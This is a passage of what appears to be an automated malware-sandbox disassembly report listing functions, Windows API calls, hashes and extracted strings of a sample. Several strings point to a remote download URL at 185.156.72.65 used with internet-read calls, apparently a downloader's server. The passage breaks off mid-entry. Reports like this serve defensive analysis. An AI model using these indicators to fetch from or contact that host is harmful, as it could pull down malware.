                      • GetModuleHandleW.KERNEL32(0042000C,?,?,04949E22), ref: 04949E6C
                      • GetProcAddress.KERNEL32(00000000,00420028), ref: 04949E7E
                      • GetProcAddress.KERNEL32(00000000,00420044), ref: 04949E8C
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04949E22), ref: 04949EAF
                      • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04949ECB
                      • CloseHandle.KERNEL32(0042D060,?,?,04949E22), ref: 04949EDB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID:
                      • API String ID: 2565136772-0
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 60f2d3ef1866f8ede7c1faaafbd31aa0a08048e47a3ccd64e449fc90f972ba62
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6A017571F80711ABE7205BB4FC0DF9B3AECAB88705B504135F905E2161DB74D9078A68
                      Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                      • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                      Function 04954073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction ID: 6d3a3cfc350efa397900819d80e266ca4b6c01479b302033a5c4270e7a4e237d
                      • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction Fuzzy Hash: E7B15A72A00365AFEB11CF64CC81BAE7BB9EF95314F244175ED04AF2A1D274B981C7A1
                      Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                        • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65$string too long
                      • API String ID: 2123813255-2459586365
                      • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                      • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                      Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 0040B837
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                      • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                      • _ValidateLocalCookies.LIBCMT ref: 0040B948
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                      Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                      Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                      • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                      Function 0494BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0494BC22,0494B1C6,0494A9D7), ref: 0494BC39
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0494BC47
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0494BC60
                      • SetLastError.KERNEL32(00000000,0494BC22,0494B1C6,0494A9D7), ref: 0494BCB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: 8bef0b2f46639e42fdef6b3747fab779de8755c2fad88a4b41a30f1e551f9359
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: D501D8322096119EB7352BFCFCC5E5B2A58EBC567D7214339E524550F1EF51B8016284
                      Function 04941867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 0494186C
                        • Part of subcall function 04949AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04949AF5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418A2
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418D9
                      • Concurrency::cancel_current_task.LIBCPMT ref: 049419EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65
                      • API String ID: 2123813255-1765470537
                      • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction ID: d785850e2d3667b4c444f598f40c96018d7a3833132ec7e9d6bddf6031acaaf2
                      • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction Fuzzy Hash: A641C8B1A00305ABE7149FB4DC86F5AB6F8EFC9354F100639E95AD7280E771B944C7A1
                      Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,79D989F6,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                      • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                      • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                      Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                      Download Yara Rule
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 004150D5
                      • __alloca_probe_16.LIBCMT ref: 0041519E
                      • __freea.LIBCMT ref: 00415205
                        • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      • __freea.LIBCMT ref: 00415218
                      • __freea.LIBCMT ref: 00415225
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                      • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                      Function 04942CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04942D5F
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04942D74
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04942D82
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04942D9D
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04942DBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                      • String ID:
                      • API String ID: 2509773233-0
                      • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction ID: 175afa162c95cfeadb4e2da24863592be78a5309dce3feafc95c42142ec1e7ff
                      • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction Fuzzy Hash: D9310532B00004AFDB149F68DC40FAAB7A8FF88305F1541F9F905DB291DB31A906CB94
                      Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004013BB
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 2296764815-3011832937
                      • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                      • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                      Function 04941597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04941622
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 4132704954-3011832937
                      • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction ID: 7258e5586a0b6b714f836cbf843b993ade46c735d2d5c04f1d01758bfd09cb40
                      • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction Fuzzy Hash: 47217C70F003448AE730DF79E80ABA6B3A0FF95308FA44279D8485B261DBB565C6CB19
                      Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                      • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                      • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                      Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(79D989F6,00000000,00000000,00000000), ref: 0041972F
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                      • GetLastError.KERNEL32 ref: 00419A6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                      • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                      Function 04959933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04959996
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04959BE8
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04959C2E
                      • GetLastError.KERNEL32 ref: 04959CD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction ID: ac4ae00053e98a5e680b4bc9fec160e7e4d4493f6071aace53cde3eeb8c891ce
                      • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction Fuzzy Hash: FED15DB5E00248DFDB15CFA8D8809EDBBF5FF49314F24456AE85AEB261D630A941CB50
                      Function 04941BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04941C6C
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04941C8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID:
                      • API String ID: 3197321146-0
                      • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction ID: 4dca8ee12fc941249610a2b83ebfa9bb9639dbb1437fa16a71cb8a2fad8c4bfb
                      • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction Fuzzy Hash: F3C139B09002199FEB24DF64CC89FE9B7B8FF89304F1041E9E509A7290D775AA85CF95
                      Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                      Function 0494BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: bdde06f235a269d078468b2cf144f212e7cf328a5c8ff44ed6905d2f0b42bfa6
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8251D3B2605606AFEB298F10D888FBB73A9EFC4314F14497DDA054B690E731FA50DB90
                      Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • GetLastError.KERNEL32 ref: 00417548
                      • __dosmaperr.LIBCMT ref: 0041754F
                      • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                      • __dosmaperr.LIBCMT ref: 00417590
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                      Function 0495774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • GetLastError.KERNEL32 ref: 049577AF
                      • __dosmaperr.LIBCMT ref: 049577B6
                      • GetLastError.KERNEL32(?,?,?,?), ref: 049577F0
                      • __dosmaperr.LIBCMT ref: 049577F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: ff8533bfb572cb16cd7e42a707f9002909eb208d62e8c759a9d0a38b944d5ae3
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 87218675600615AFEB11EFA1D880D6A77ADFF84268B208579ED1997260D731FD00C760
                      Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
